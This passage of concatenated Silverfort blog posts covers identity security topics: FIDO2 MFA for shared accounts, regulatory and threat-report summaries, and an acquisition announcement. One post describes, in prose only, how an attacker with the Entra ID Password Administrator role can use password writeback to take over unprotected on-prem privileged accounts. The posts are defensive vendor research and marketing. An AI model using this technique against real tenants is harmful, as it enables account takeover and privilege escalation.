Silverfort by accessing resources “directly,” as they (and threat actors) often do with traditional PAM solutions. Reshaping the future of identity security. The launch of PAS is another important step in Silverfort’s mission to deliver a single solution that addresses the full scope of identity security needs. What’s more important than the specific capabilities, is that PAS operates with our existing modules - ISPM, ITDR, MFA, Service Account (NHI) protection, and Authentication Firewall – to form a whole that is far greater than the sum of its parts. For the first time, security teams can get a turnkey solution to address identity threats end-to-end, in which the ability to protect administrative access plays a key role.   Join us in redefining what’s possible. Learn more about Silverfort Privileged Access Security here. --- - Published: 2024-11-26 - Modified: 2025-02-26 - URL: https://www.silverfort.com/blog/how-fido2-enhances-identity-security-for-shift-based-shared-accounts-in-retail-and-manufacturing/ In industries that require shift-based workforce, like retail and manufacturing, sharing user accounts are a common solution for employees who need quick access to critical systems, especially during fast-paced handovers between shifts. However, the use of shared accounts in an organization's environment should be a warning sign for the security team. From cash registers and point-of-sale (POS) systems in retail chains to operational technology (OT) systems in manufacturing plants, shared accounts expose organizations to severe security risks which can result in data breaches and sensitive data leakage. In this blog, we will highlight the unique security challenges that organizations with shop and factory floor workforces face with shared accounts. Afterwards, we will show how Silverfort’s native integration with FIDO2 tokens adds an additional layer of security and offers employees a seamless authentication process to login to critical systems. Why Shared Accounts Are a Security Weak Spot for Shift-Based Workforces Shared accounts in shift-based organizations create complex challenges, primarily due to the need for credential sharing. Employees often share their user credentials, especially in fast-paced retail and manufacturing environments where personal accounts aren’t practical. This hinders efforts to track individual users’ activities, increasing the risks of exposed passwords, almost guaranteed misuse and credential compromise, that is just a matter of time. Without individual accountability, organizations are exposed to insider theft or supply chain attacks.   In addition, shared accounts are always one of the weakest parts of identity security posture. Once compromised they allow attackers to move laterally across the environment or escalate privileges with minimal detection. Unauthorized entry into a retail POS system or manufacturing OT system could lead to potential operational disruptions, system malfunctions, or costly downtime. Without enabling strict access control policies, ensuring only authorized users have legitimate access to the systems is a significant challenge. How Silverfort Secures Shared Accounts with FIDO2 MFA Integration Silverfort’s native FIDO2 Multi-Factor Authentication (MFA) enables organizations that use FIDO2 keys to apply an extra layer of security for user accounts and critical systems. With Silverfort’s FIDO2 integration, organizations can apply token-based authentication on shared accounts to ensure only authorized team members have access to critical systems. By adding MFA to the authentication process, the risk of credential compromise and unauthorized access is reduced. In addition, Silverfort provides complete visibility into shared accounts and tracks all user access attempts, making it possible to monitor individual activity within a shared environment. With Silverfort’s real-time monitoring capabilities, organizations gain a comprehensive log of all authentication activities, making it easier to detect potential security threats and ensure shared account access is secure and fully auditable. Let’s see how Silverfort helps shift-based industries create secure spaces within their shared environments. Visibility Into Shared Accounts Silverfort helps to identify shared accounts automatically and provides real-time visibility into all user activity. With Silverfort, you can detect and respond to malicious activities much faster, including blocking access of any accounts that display suspicious activity. In Silverfort’s Insights Page, you will gain actionable information about all protected domains (users and resources) and a high-level view of your organization’s security posture. In the Users & Passwords section, you can get visibility into all shared accounts in your environment. These accounts are detected by analyzing access attempts from multiple devices and servers at the same time and flagging that they could be shared by separate human users. Screenshot #1: Discovering the number of shared accounts in the Insights screen By clicking on the Shared Accounts icon, you will be able to see all the details in the pop-up window. With the names of these shared accounts, you can export them for future in-depth analysis or investigate one by one with policies enforcement, including deleting or applying deny access policies to shared accounts. Screenshot #2: Displaying the complete list of shared accounts Creating MFA Policy for Shared Accounts Protection To prevent any unauthorized user access to a shared account, we recommend you create a specific policy that triggers MFA when a user requests access. This will add an additional level of protection to your critical resources, since shared accounts often have many permissions as they are used in different contexts. Screenshot #3: MFA access policy for additional identity verification of shared accounts Enter Silverfort’s Policies screen and click “Create a new policy”. Choose your IdP in the Auth Type section and check necessary authentication protocol – Kerberos/NTLM or LDAP(s). Static-based policy should be applied as a Policy Type and specific Shared Account user should be chosen in User and Groups section, whose access you would like to trace based on your business needs. Choose MFA as the Action and then select FIDO2 token among other options. Screenshot #4: MFA access policy advanced options for additional policy restrictions Additionally, in the Advanced Options section you could choose Policy Restrictions, where you can set whether this policy should be applied always or only during specific times or days. In the MFA Frequency section, you should select parameters to determine how often MFA requests are sent to the user (Require MFA), including previous MFA attempt (From) and the user, device or resource for which the previous MFA was performed (According To). Once this policy is set, it will trigger MFA during the authentication process to chosen shared accounts. Even if this shared account was compromised, this policy would set MFA as an additional security measure with FIDO2 token set up, prompting the user to approve access request. Using FIDO2 Tokens in Silverfort Authentication Policies Silverfort supports the use of any FIDO2 tokens to approve MFA requests for protected users, including shared accounts. When a user attempts to access critical resource, a push request is sent to the user’s machine, and the user is prompted to insert their FIDO2 key to verify their identity and approve the MFA request. Enabling Real-Time Protection for Securing Shared Accounts in Shift-Based Industries With shared accounts becoming a common security risk in shift-based environments, applying FIDO2 tokens can significantly enhance concrete security controls across users and resources. By gaining visibility into every user access attempt and applying strict authentication policies, Silverfort enables organizations to minimize the risk of unauthorized access and credential misuse. This ensures critical systems remain highly protected, even in high-turnover and shift-based workforces. Looking to enforce advanced identity security controls across your environments? Schedule a call with one of our experts. --- - Published: 2024-11-22 - Modified: 2025-02-07 - URL: https://www.silverfort.com/blog/enhancing-cyber-security-with-silverfort-addressing-key-insights-from-the-asd-acsc-annual-cyber-threat-report-2023-2024/ Over the past year, the Australian Cyber Security Centre (ACSC) received nearly 90,000 cybercrime reports and more than 36,700 calls to its Cyber Security Hotline, according to their 2024 Annual Cyber Threat Report. On average, that's one cybercrime being reported every six minutes and 100 calls each day. The biggest cyber incident affecting critical infrastructure in Australia involved compromised credentials, while credential theft was the most common cybercrime reported by individuals. In this article, we'll examine the report's key points on identity security and how Silverfort aligns with them.   The ASD ACSC Annual Cyber Threat Report 2023-2024 has provided critical insights into the current cybersecurity landscape, highlighting the ongoing challenges faced by organizations across various sectors. Here are the key focus points where Silverfort can help:  1. Incident Categorization and Response  The report categorizes cybersecurity incidents on a scale from Category 1 (C1), the most severe, to Category 6 (C6), the least severe. Incidents categorized as C3 or above involve significant organizations such as federal and state governments, large enterprises, academia, and supply chains.   Silverfort’s platform is designed to provide comprehensive protection for these critical entities by:  Monitoring and analyzing authentication and access attempts across all resources.   Detecting and preventing unauthorized access in real time.   Enforcing adaptive multi-factor authentication (MFA) based on risk assessment, with a strong recommendation for phishing-resistant MFA methods like FIDO2 and passkeys to ensure the highest level of security.    2. Compromised Accounts and Credentials With 23% of C3 incidents involving compromised accounts or credentials, credential theft remains a significant threat. Silverfort addresses this by:  Eliminating the reliance on static passwords using adaptive MFA, and ideally with the use of phishing-resistant MFA methods such as FIDO2 and passkeys.   Detecting anomalous behavior that may indicate credential compromise.   Preventing lateral movement within the network.    3. Critical Infrastructure Protection  Critical infrastructure sectors, including electricity, gas, water and waste services, made up 11% of all cybersecurity incidents. The most frequently reported sectors were electricity, gas, water, and waste services (30%), education and training (17%), and transport, postal, and warehousing (15%).   Silverfort helps protect these vital services by:  Securing access to critical systems and data.   Providing visibility into all authentication attempts.   Enforcing strict access policies to ensure only authorized users can access sensitive resources.   Addressing the top incident type for critical infrastructure, which was compromised accounts or credentials (32%), by preventing unauthorized access and detecting compromised credentials.   Noting the similarity in the top incident type for government entities (federal, state, and local), where compromised accounts or credentials also accounted for 30% of incidents, and applying the same robust protection mechanisms to secure these accounts.    4. Addressing Common Cyberattack Techniques  The report highlights the growing threat of credential stuffing and password spraying attacks, which are known as brute-force attacks. In FY2023–24, the Australian Information Commissioner (OAIC) received over 1000 notifications of data breaches involving personal information likely to result in serious harm, a 13% increase from FY2022–23. Furthermore, 8% of incidents handled by ASD in FY2023–24 involved brute force. Silverfort’s platform is equipped to handle these threats by:  Identifying and blocking high-volume automated attacks.   Applying risk-based authentication to challenge suspicious login attempts.   Integrating with existing security infrastructure to enhance overall protection.    5. Quishing: The Unseen Threat in QR Code Technology  Quishing, or phishing via QR codes, is an emerging threat. In FY2023–24, ASD responded to 30 incidents of quishing, demonstrating a clear trend towards new forms of social engineering. Silverfort’s solution can help mitigate this risk by:  Validating the authenticity of login requests initiated through QR codes.   Ensuring MFA is applied to all authentication attempts, regardless of the method used – preferably using phishing-resistant MFA methods like FIDO2 and passkeys for enhanced security.   Silverfort’s Unified Identity Security platform is uniquely positioned to address the evolving identity-related aspects of the cybersecurity threats outlined in the ASD ACSC Annual Cyber Threat Report 2023-2024. By leveraging our advanced authentication and access controls, organizations can significantly enhance their security posture and protect against today’s most pressing cyber threats.   --- - Published: 2024-11-19 - Modified: 2024-11-26 - URL: https://www.silverfort.com/blog/do-you-have-all-the-identity-security-signals-and-controls-to-make-ssf-caep-work/ Every day, your Active Directory processes millions of authentication requests, permission changes and access events. Hidden within this flood of activity are the subtle patterns of potential attacks: authentication downgrades, unusual service account behavior and suspicious access attempts. Your security tools may detect these signals, but as frameworks like Security Signals Framework (SSF) and Continuous Access Evaluation Protocol (CAEP) emerge to connect security tools, organizations must ask themselves: do their existing solutions have the fundamental capabilities needed to make these frameworks effective? Today's Security Integration Challenges: A Perfect Storm of Change  Enterprise security leaders stand at a critical inflection point. The promise of seamless integration between security tools is finally within reach, but success requires more than just implementing new frameworks. Organizations must fundamentally rethink how their security solutions work together to detect, share, and respond to threats across traditional security boundaries.   This fundamental rethinking comes at a crucial moment in the evolution of security, driven by three major shifts that will transform our approach to integration:  First shift: the rapid adoption of hybrid work and cloud services has dissolved traditional security boundaries, forcing tools to adapt beyond their original domains. The identity perimeter has become dynamic and fluid –– a single user now accesses resources from multiple locations, devices and networks, often simultaneously.   Second shift: the acute shortage of security talent has made manual correlation and response workflows unsustainable. Security teams can no longer keep pace with the volume of alerts and complexity of threats through manual analysis and response.   Third shift: the maturation of security automation, standardized APIs and machine learning has made real-time cross-tool coordination technically feasible. While previous integration attempts focused on sharing data after the fact, SSF and CAEP represent the first real opportunity to create a truly connected security ecosystem that can match the speed and scale of modern threats.   The Evolution of Security Operations  At its heart, cybersecurity follows a standard straightforward flow: we monitor activity, identify risks, and enforce protective actions. For example, in endpoint security we watch process creation and file system changes, spot malicious patterns, and respond by blocking execution or isolating systems. Network security works the same way, by watching traffic patterns, catching anomalous data flows and enforcing access controls. This approach works well when we're looking at individual security domains.   Let's break down a real-world example of how modern attacks slip through disconnected security tools (through a 15 minute attack time frame):  Initial Access (9:15 AM) Employee opens malicious PDF, executing hidden PowerShell script Tools see: EDR logs PDF and PowerShell as low risk; Network sees normal HTTPS traffic  Credential Harvesting (9:17 AM) Attacker extracts credentials from memory using Mimikatz Tools see: Windows logs show LSASS access; EDR flags 'suspicious' but doesn't block  Privilege Escalation (9:20 AM) Compromised service account accesses development server Tools see: AD sees normal authentication; SIEM logs multiple successful logins  Lateral Movement (9:25 AM) Attacker moves through network using pass-the-hash Tools see: NDR notices increased traffic; Identity tools see normal authentications  Data Exfiltration (9:30 AM) Sensitive data leaves through approved cloud storage Tools see: CASB and DLP observe authorized user activities within policy  The critical gap that allows attackers to move from initial access to data theft in just 15 minutes.  Each security tool only sees legitimate-looking pieces of the attack. EDR can't connect file execution to credential theft. Identity tools miss the link between service account usage and initial compromise. Network tools see authenticated access. Cloud security observes authorized actions. Without real-time coordination, the complete attack chain remains invisible until it's too late.   Building the Connected Security Ecosystem  This is where frameworks like SSF and CAEP enter the picture. By embedding standardized communication capabilities within security solutions, these frameworks enable real-time sharing of security signals across different tools and vendors. Think of it as creating a universal security language. When an EDR tool detects suspicious process execution, it immediately broadcasts this information in a standardized SSF format that all other tools understand. Network security tools can instantly consume this signal, correlate it with traffic patterns and share back their own enriched observations. Identity security solutions simultaneously receive these signals, add user risk context and contribute authentication patterns to the shared understanding.   Instead of complex point-to-point integrations, organizations can implement a unified security fabric where threats trigger immediate cross-domain responses through SSF/CAEP's central message bus.   However, this real-time communication framework only delivers value when security tools can both generate comprehensive signals and translate them into automated actions –– after all, having the pipes to share information means nothing if your tools can't speak the language or act on what they hear.    Identity Security: From Detection to Response  The identity security domain perfectly illustrates these requirements. With Active Directory processing countless authentication and access events, organizations need both comprehensive visibility and rapid response capabilities. Your identity security solutions must detect suspicious access patterns between resources in real time, flag multiple failed authentications attemptimmediately and recognize when users are accessing an unusual number of destinations in a short period. But detection alone isn't enough. Your security stack needs to act on these signals. This means immediately restricting access for compromised accounts, requiring additional authentication when risk levels rise, automatically isolating systems to prevent attack spread and alerting security teams with full context through multiple channels. Your tools need to enforce authentication protocols in real time and adapt to emerging threats.   Building Your Security Foundation  As you consider implementing SSF and CAEP in your environment, the success of your security integration strategy hinges on your tools' fundamental capabilities. Most organizations focus immediately on the technical aspects of framework implementation –– the APIs, the message formats, the integration architecture. But two critical questions must be answered first:  Does your current security stack provide all the essential signals these frameworks require? Can your tools translate detections into meaningful automated responses?   Security tools today are great at spotting problems, but that's only half the story. For frameworks like SSF/CAEP to work, your tools need to do more than just detect –– they need to share what they find and act automatically. Without these basic capabilities, even the most advanced integration plans won't deliver real security value.   When the next attack comes –– and it will –– will your security tools be ready to share the signals that matter and take the actions needed to stop it? That's the question you need to answer today.   --- - Published: 2024-11-13 - Modified: 2024-11-21 - URL: https://www.silverfort.com/blog/silverfort-acquires-rezonate-cloud-identity-security/ We’re excited to welcome Rezonate to the Silverfort team, expanding our identity security platform deeper into cloud environments and breaking down the traditional silos of identity security, both on-prem and in the cloud, for human and non-human identities.   Building Silverfort has been an incredible journey. It started in 2016 with the belief that identity security will become the most important element of cybersecurity, and defending against the evolving threats will require an entirely new approach. This conviction led my fellow co-founders and me to explore new ideas and invent the groundbreaking technology that made our new approach possible – one that delivers identity security everywhere, seamlessly.   It’s been a journey of firsts. From finding the first customers and partners who believed in our vision and trusted us to deliver it to achieving and exceeding 100% year-on-year growth for several years now. From convincing our first employees to join this crazy adventure (most of them are still with Silverfort today) to being named the #1 best startup company to work for by Dun & Bradstreet. Each step we take together reinforces my belief in the power of teamwork and innovation and reminds me how privileged I am to share this journey with such remarkable people.   Today, I’m excited to announce another first: Silverfort is acquiring Rezonate.   Rezonate: Innovator in cloud identity security Rezonate’s team lives and breathes identity security. They bring deep expertise in this space, with a clear focus on cloud environments. Thanks to their expertise, talent, and hard work, their product offers the most impressive set of cloud identity security capabilities we have seen from any early-stage startup.   Their offering includes Non-Human Identity (NHI) security, Identity Threat Detection and Response (ITDR), Identity Security Posture Management (ISPM), Entitlement management and more. Their coverage includes all cloud assets, including cloud identity providers (IdPs), cloud infrastructure, and SaaS applications. Rezonate's solid architecture also enables them to flex and scale to meet every customer's needs, with unmatched speed and simplicity – and customers love them for it. Our teams share a vision to solve identity security once and for all – and finally give organizations an end-to-end answer to this problem from the single powerful platform they deserve. As Roy Akerman, CEO and Co-Founder of Rezonate, puts it: “To stay ahead of rapidly evolving identity threats, organizations need a single platform that solves this problem holistically, not in silos. They want it to come from a partner that truly understands identity security. Silverfort is on a clear path to lead this market because it breaks the old paradigms, innovates faster than anyone else, and has a team that is hyper-focused on this mission. We couldn’t be more excited to join them and build the most complete identity security platform in the industry together. ”   Protecting Every Dimension of Identity with a Unified Platform  Organizations now realize that identity security isn't just another element of cybersecurity — it creates the most essential conditions required for success. Yet identity security has been treated for decades as a feature of the identity infrastructure, and therefore remained siloed. If a compromised user account fails to authenticate in one environment, the attacker can still use it in other environments within the same organization, because each infrastructure provider only covers its own piece of the puzzle. With a glut of point solutions that focus on either cloud or on-prem, or on a very specific part of the problem, it’s clearly time for a more holistic approach.   We started Silverfort because we knew identity security needed to be done differently. To bring modern security everywhere – to every corner of the fragmented identity infrastructure – security must be delivered as a seamless layer. It cannot be implemented system by system. Making this possible required inventing an entirely new technology. We spent years under the radar innovating and building the platform that will change this market and deliver a unified end-to-end approach to identity security.   This time – and focus – have served us well: we now have the broadest and most advanced platform in the identity security market, we’re growing much faster than any other company in this category, and we are trusted by almost a thousand of the world’s leading enterprises, including many of the Fortune 50. We’re now ready to seize the opportunity and move even faster towards market leadership. The acquisition of Rezonate is another significant step towards this vision. It expands our capabilities deeper into cloud environments, and combined with our existing offering, it will allow our customers to enjoy the first true end-to-end identity security platform in the market. We plan to finish integrating Rezonate’s technology into our unified platform in mid-2025.   Today’s news is a massive milestone in our quest to reinvent identity security and lead this fast-growing market. We could not have done it without the support of our customers, our partners, our investors, and, of course, our extraordinary team. Thank you all for joining us and helping us build this company.   Most importantly, and from everyone at Silverfort: Welcome to the team, Rezonate! We look forward to creating something amazing together.   --- - Published: 2024-11-06 - Modified: 2024-11-06 - URL: https://www.silverfort.com/blog/new-cybersecurity-regulations-in-new-york-what-general-hospitals-must-do-to-stay-compliant/ Every general hospital in New York State is now experiencing a significant shift in their cybersecurity requirements. As of October 2, 2024, the New York State Department of Health has introduced comprehensive amendments to Part 405. 3 that mandate stronger cybersecurity controls for all 195 general hospitals in the state. Hospitals that are required to comply must do so by October 2, 2025. These new regulations mandate that all general hospitals implement advanced cybersecurity programs and follow new incident reporting protocols, including a 72-hour window for reporting significant cybersecurity incidents. In today's healthcare landscape, where all systems and services manage everything from patient records to critical care equipment, these requirements represent an important step toward protecting the healthcare infrastructure. Let's explore what these changes mean for general hospitals and how Silverfort can help. Understanding 10 NYCRR 405. 46 Introduced by the New York State Department of Health (DOH) in 1999, 10 NYCRR 405. 46 initially focused on protecting patient rights in hospital settings, particularly regarding the use of restraints and seclusion. In response to the increasing integration of technology into healthcare operations, the regulation evolved to address the increasing risk of cyber attacks against healthcare data and systems. According to 10 NYCRR 405. 46, healthcare facilities are required to implement comprehensive cybersecurity measures to protect sensitive patient information and critical hospital infrastructure. Up until October 2024, these measures included data encryption, access controls, and continuous monitoring of electronic health records (EHRs). This ensured that hospitals maintained rigorous data protection standards, reinforcing both patient privacy and healthcare system resilience against cyber threats. By mandating such proactive cybersecurity standards, New York State supported hospitals in upholding both the privacy rights and safety of their patients and highlighted their commitment to adapting healthcare regulations in response to emerging cybersecurity challenges. New York State’s New Cybersecurity Mandates for Hospitals: 10 NYCRR 405. 46 The New York State Department of Health announced in early October 2024 new regulations to 10 NYCRR 405. 46, mandating stronger cybersecurity protections across New York’s 195 general hospitals. Full compliance is required by October 2, 2025, though hospitals must begin reportingcybersecurity incidents within 72 hours as of October 2, 2024. This regulation targets protectionfor patient health information (PHI) and personally identifying information (PII) against cyberthreats. Key Components: Cybersecurity Program: Hospitals must implement a robust cybersecurity program thatincludes network monitoring, incident response, training, and policy development. Chief Information Security Officer (CISO): Hospitals are required to appoint a CISO,either as a direct employee or a third-party contractor, to oversee cybersecuritymeasures. Testing and Vulnerability Assessments: Regular testing, including scans and penetrationassessments are required to manage cybersecurity risks. Audit Trails and Records: Hospitals must maintain audit trails to detect and respond tocyber incidents and securely retain records. Incident Response: A detailed response plan is mandatory, with incident reporting tothe Department of Health within 72 hours. Access Control Measures: Requirements include enforcing multifactor authentication(MFA) for external systems, limiting privileged account use, annual access reviews, andtailored cybersecurity training. Mandates and State Support: Annual Access Review: Hospitals must annually review and remove unnecessary user access, posing challenges for legacy accounts. Funding and Insurance Impact: New York has allocated $500 million to supportcompliance, with potential impacts on cyber insurance terms. Through these mandates, New York aims to strengthen healthcare cybersecurity and supporthospitals in protecting patient data from evolving cyber threats. Resolve Every 10 NYCRR 405. 46 Identity Security Requirement with Silverfort Silverfort equips hospitals to meet New York's new cybersecurity mandates with efficient, cost-effective identity security capabilities tailored to healthcare environments. By integrating Silverfort's key capabilities into your cybersecurity program, you will be able to check the box for each NYRR 405. 46 requirement by: Extending MFA protection to command-line access, legacy apps, IT infrastructure, and other critical resources that couldn’t be protected before. Applying strong security access controls by enforcing MFA across all sensitive resources, ensuring only authorized users can access critical systems and data Enforcing MFA or access block policies on all privileged users, both human admins and service accounts ensuring they have access only when necessary is a key component of privileged access security. Continuously monitor all access requests to detect anomalies and prevent malicious access in real-time. Detecting and responding to identity threats such as privilege escalation and lateral movement attacks and responding automatically with real-time blocking. With Silverfort's rapid incident detection, hospitals can meet the 72-hour reporting requirement by quickly identifying cybersecurity incidents. Furthermore, Silverfort supports comprehensive risk assessments and offers valuable tools that assist newly appointed CISOs in managing comprehensive security programs. Designed with healthcare environments in mind, Silverfort addresses industry-specific threats and prepares hospitals for future regulations by implementing scalable identity security controls aligned with security best practices. Download our white paper to learn more about how Silverfort can assist you in meeting the requirements of 10 NYCRR 405. 46 or schedule a call with one of our experts. --- - Published: 2024-10-31 - Modified: 2024-11-06 - URL: https://www.silverfort.com/blog/exploiting-weaknesses-in-entra-id-account-synchronization-to-compromise-the-on-prem-environment/ Active Directory (AD) is a Microsoft product designed to assist network administrators in managing user permissions within an organization. It is installed on a Windows Server, turning it into a Domain Controller responsible for managing enterprise environments and performing actions such as storing all user accounts, their passwords and permissions, and managing user authentication.   Over time, the world is increasingly moving towards cloud adoption, and Microsoft has also been pushing organizations to shift towards cloud-based environments for more streamlined and modern identity management. Microsoft’s solution for cloud-based domain environment is Entra ID. It extends the capabilities of on-premises AD to the cloud, providing a robust solution for managing identities and access for cloud-based applications. To enable a seamless integration with supporting legacy systems, Microsoft introduced Entra ID Connect. This tool allows organizations to link their on-premises Active Directory (AD) environment with Entra ID, creating a “hybrid joined environment”.   Through Entra ID Connect, organizations can synchronize users and directory data from their on-premises AD to the cloud. This enables users to access cloud services while using the same credentials as for their on-premises systems. One interesting feature Entra ID Connect supports is password writeback, where password changes made in the cloud are synced back to the on-premises AD, ensuring consistent identity management across both environments. This hybrid model ensures that organizations can maintain a unified identity system while operating across both cloud and on-premises infrastructures.   The differences in permission management between legacy Active Directory and Entra ID can lead to security gaps in the synchronization process between the two products.   Deep Dive into Permission Management  Permission management in Active Directory operates in such a way that in each environment, there are several default privileged security groups with elevated permissions to make changes. When we want to grant a specific user these permissions, we simply add them to the group. For example, the "Domain Admin" group grants privileges to all users within it. Another method for defining permissions for users or groups is through the ACL (Access Control List). This list exists for each object in AD and specifies the permissions for each entity. This mechanism allows for the assignment of permissions to a regular user to make modifications, even to objects belonging to users with high-level privileges, such as Domain Admins. However, in Entra ID (formerly Azure AD), there are no security groups by default. Instead, it uses an RBAC (Role-Based Access Control) mechanism. This means there are many types of roles, each defining different user permissions. You can also assign a role to a group, and all members of that group will inherit the same permissions. But this option does not include groups defined by default, like Active Directory.   So, what's the difference between the two mechanisms? In Entra, a modification protection is provided when a user receives privileged permissions by role or group assignment. In legacy AD, we discovered that not all sensitive groups are protected from modifications. In fact, certain sensitive groups are treated as weak when it comes to Entra ID Connect synchronization.   In Entra, whenever a user receives a privileged role, they are automatically granted modification protection. Only a user with higher-level privileges or equivalent role level can perform changes, preventing any other user with lower role level from doing so. This means the user doesn’t have to be a member of a security group to be protected—simply assigning them a privileged role is enough to provide them with some level of protection, unlike in AD.   For example, in the hierarchy of administrator roles within Entra ID, the Password Administrator role grants users the ability to reset passwords. However, despite being categorized as an administrator, this role is considered one of the lowest in the admin hierarchy. As a result, Password Administrators can only reset passwords for regular users or users holding the same admin role. They do not have the authority to reset passwords for users in higher-level administrator roles, such as Global Administrators or other privileged accounts, maintaining a clear security boundary between different admin roles. This hierarchical structure ensures that more sensitive roles are protected from unauthorized password changes.   Password administrator role How Does Synchronization Happen?   The synchronization process between on-premises AD and Entra ID can be divided into two main parts:  Syncing Identities from On-Premises to Entra ID  Password Writeback from Entra ID to On-Premises  Part 1: Syncing from On-Premises to Entra ID  Entra ID Connect creates a service account user called MSOL following the first 8 bytes of the installation identifier. This user has powerful capabilities which may be equivalent to a Domain Controller. The “Replicating Directory Changes All" permission allows the user to perform DC sync and extract all the object’s attributes including the client’s credentials––in other words, its NT Hash. Due to the extensive permissions granted to this user across the directory, it can access and read information about users in protected groups. This is because the permissions provided enable the user to operate with Domain Controller-like privileges. Consequently, even if the user is not explicitly listed in a group’s ACL, it still retains the ability to retrieve the NT Hash of the group members. This permission allows the on-premises side of the synchronization process and is managed using Directory Replication Service Remote Protocol, which operates over RPC transport. The same protocol is used to perform the DCSync attack.  The on-premises sync agent sends all user information and attributes to Entra ID over port 443. Once Entra receives this data, it processes and populates the necessary details within its environment, completing the initial synchronization process.   Part 2: Password Writeback from Entra ID to On-Premises  The second part of the synchronization process takes place when Password Writeback is enabled in Entra AD Connect. This feature allows password synchronization from the cloud to the on-premises environment, so when a user changes their password in the cloud, the change is also reflected on-premises. This ensures accurate synchronization between the two environments, which is one of the main reasons for connecting them: to allow users to log in with the same password across all applications and environments in the organization.   When a password reset action is initiated for a user in Entra ID, the system first searches for the username to verify that it exists in Entra ID. If the user is discovered, a permissions check is performed to see if the person attempting the password reset has a role that allows them to perform this action. If the user has the necessary permissions, Entra ID sends the username and the new password to the Entra Service Bus.   The sync agent running on-premises retrieves this information. Since the MSOL user created by Entra Connect has DS Sync permissions but only for reading, it does not use the RPC protocol to reset the password. Instead, it performs an LDAP request to locate the corresponding user in Active Directory and attempts to update the password with the request using the “IADsUser. ChangePassword” operation.   At this stage, a crucial security check is performed: when the LDAP request is received by the domain controller (DC), the Active Directory permissions system checks whether the user attempting the password change has the necessary permissions to reset the password for the target user. This is done by examining the target user's ACL. If the MSOL user does not have the "Reset Password" permission over the entity, an error is sent back to Entra ID, indicating that the password update failed due to insufficient permissions. If the "Reset Password" permission is present, the password change is successfully completed. The security gap  During the synchronization process, I noticed there is no full coverage of which users belong to privileged groups or have higher permissions. Consequently, in the Entra environment, these users do not automatically receive the same privileged status as they do on-premises. By default, hybrid users do not receive the same protection as privileged roles in Entra during initial synchronization, unless the network administrator manually assigns these privileges and protections within Entra ID.   Understanding the synchronization capabilities between the two environments and the ability to synchronize credentials back from Entra to on-premises, the question arises: what are the potential risks involved?   The main risk is gaining elevated permissions in on-premises AD through a weak admin role in Entra. While in AD, a user can receive privileged permissions but not necessarily belong to a protected group, which leaves them exposed to attacks. The same risk exists in this attack flow here:  Once an attacker gains control over an Entra ID user with the Password Administrator role assigned, they can leverage its password reset permission to elevate their permissions, even though the user may not have an on-premises user. By resetting the password of a user with elevated AD permissions, like a user from the DNS Admins group, they could gain control over the account and potentially escalate privileges within the on-premises domain.   Reset user passwords All the attacker needs to do is log in with the right user account, which has at least the Password Administrator role to Entra ID. It doesn't matter if they use the interface at https://entra. microsoft. com or https://portal. azure. com. Once logged in, they select the target on-premises user and simply reset their password. This allows the attacker to log in to the on-premises environment with the account whose password they changed. It is important to note that if the targeted user is part of a protected group in the on-premises environment, the attack will fail. Failed to reset password of user in protected group This is because the permission management for protected users on-premises blocks changes from being made by an Entra ID Connect account to users in those protected groups. In an on-premises environment, protected groups can be identified by examining the adminCount attribute of the group. If the adminCount attribute is set to "1", it indicates that the group is considered protected. These protected groups follow a fixed permissions template that is periodically enforced. Every hour, a protection mechanism in Active Directory runs a process that checks if the group's permissions in the ACL match the permissions defined in the template. If there is a discrepancy, the process resets the permissions to align with the template. Protected group adminCount attribute  This process is managed by a mechanism called SDProp (Security Descriptor Propagator), and the permissions template is known as AdminSDHolder.   Attack Scenarios That Exploit This Weakness Shadow Admins  Shadow Admins are users that can reset password to an admin but do not belong to any admin group. Since both on-premises Active Directory and Entra ID treat these Shadow Admins as regular users (without special protection by privileged user groups), an attacker can exploit their ability to reset the password of a privileged user in Entra. This means the attacker can also reset that user’s password in the on-premises environment.   This scenario provides attackers with a clear pathway to escalate privileges and expand their control across the network, taking advantage of the compromised user’s elevated permissions.   DNS Admin Group  Another example is the DNS Admin group. DNS Admins manage critical network infrastructure components, specifically DNS servers. Since the DNS Admin group is set up as a privileged group without additional protection on-premises, an attacker could easily reset the password of a DNS Admin group member via Entra. This would give them full control over that account in the on-premises environment.   With control of a DNS Admin account, the attacker could significantly disrupt network operations. They might modify DNS records to redirect internal network traffic, perform Man-in-the-Middle (MITM) attacks by rerouting traffic through servers they control, or alter DNS settings to send users to malicious websites. MSOL user had a reset password on the DnsAdmins group.   Group Policy Creator Owners  Group Policy Creator Owners is another example of a group that could be a privileged group without additional protection. Members of this group can modify Group Policy Objects... --- - Published: 2024-10-23 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/identity-under-siege-why-attackers-are-targeting-mfa-gaps-and-how-to-respond/ Cyberattacks are becoming more frequent and sophisticated, with identity as the main target for threat actors and ransomware as a service (RaaS) providers. A staggering 83% of organizations have experienced breaches involving compromised credentials, a clear indicator that identity-based attacks are becoming the go-to strategy for attackers. This alarming statistic forms the foundation of the AIG & Silverfort white paper, “Identity Has Become the Prime Target of Threat Actors”, which sheds light on how attackers are exploiting gaps in identity and access management (IAM) strategies, especially where multi-factor authentication (MFA) is either misconfigured or not fully deployed. Why Identity Is the New Battleground The increasing reliance on users' identitiies across cloud, hybrid and on-prem environments has turned identity into a critical security battleground. Once considered secure with basic MFA in place, credentials have become a common point of entry for cybercriminals. Attackers are finding ways to bypass traditional MFA methods, whether it is through phishing, social engineering or direct compromise. One of the primary reasons for this security gap is the incomplete implementation or misconfiguration of MFA across all critical systems. This includes legacy infrastructure and privileged accounts. MFA coverage is typically limited to web-based and cloud-based applications, leaving older systems and administrative resources unprotected. The gap provides attackers with a direct pathway for infiltrating networks, escalating privileges and deploying ransomware. The Challenges of Implementing MFA While MFA is widely recognized as one of the most effective defenses against identity-based attacks, many organizations struggle to implement it comprehensively. Some of the key challenges include: Legacy Systems Don’t Support MFA: Older systems and applications do not natively support MFA, making it difficult for organizations to secure these resources without significant infrastructure upgrades. Outdated Insecure Authentication Protocols: Protocols like NTLM and Kerberos, still used in many on-prem environments, were not designed with modern security controls in mind. They leave significant gaps in protection that MFA doesn’t always cover. Misconfigurations: Even where MFA is in place, misconfigurations can leave systems vulnerable to compromise. For example, MFA may be applied at the perimeter but privileged accounts—arguably the most critical—might lack proper protections within the internal network. Agent-Based Limitations: Traditional MFA implementations often rely on agents or proxies that are difficult to deploy across diverse infrastructures, leading to coverage gaps. The Consequences of Incomplete MFA The AIG & Silverfort white paper highlights several real-world examples where MFA failures have led to devastating breaches. In one instance, a company’s employee credentials were compromised through a Citrix gateway that wasn’t protected by MFA. By compromising a privileged account, the attackers gained access to the network, moved laterally within it, and eventually 